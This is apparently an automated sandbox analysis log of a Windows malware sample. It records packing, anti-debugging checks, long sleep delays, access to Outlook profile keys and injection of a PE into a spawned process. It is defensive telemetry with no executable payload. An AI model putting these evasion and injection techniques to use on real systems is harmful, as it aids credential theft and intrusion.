Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: lqoUUYTMsL.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: lqoUUYTMsL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTR

Source: lqoUUYTMsL.exe	Static PE information: section name: C)Ez
Source: lqoUUYTMsL.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_05600769 push ds; iretd	0_2_0560076F
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_018B741A push ebp; iretd	0_2_018B7421
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A0569 push edi; retf	0_2_056A056F
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A1821 push esp; retf	0_2_056A1822
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A1817 push esp; retf	0_2_056A1818
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A2739 push cs; iretd	0_2_056A273A
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 0_2_056A2A87 push esp; ret	0_2_056A2A89
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AD4
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AFC

Source: lqoUUYTMsL.exe

Static PE information: section name: C)Ez entropy: 7.99934222787656

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 3500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 17C0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 5690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 6690000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 5690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 5690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 67C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 77C0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 7C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 8C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 5760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 8C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory allocated: 9C10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe TID: 6208	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe TID: 6428	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: lqoUUYTMsL.exe, 00000001.00000002.1680125185.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: lqoUUYTMsL.exe, 00000004.00000002.1644852471.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: lqoUUYTMsL.exe, 00000002.00000002.1643495278.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, lqoUUYTMsL.exe, 00000003.00000002.1644354809.0000000001488000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

2_2_0040317B

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,

2_2_00402B7C

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Memory written: C:\Users\user\Desktop\lqoUUYTMsL.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior
Source: C:\Users\user\Desktop\lqoUUYTMsL.exe	Process created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe	Jump to behavior
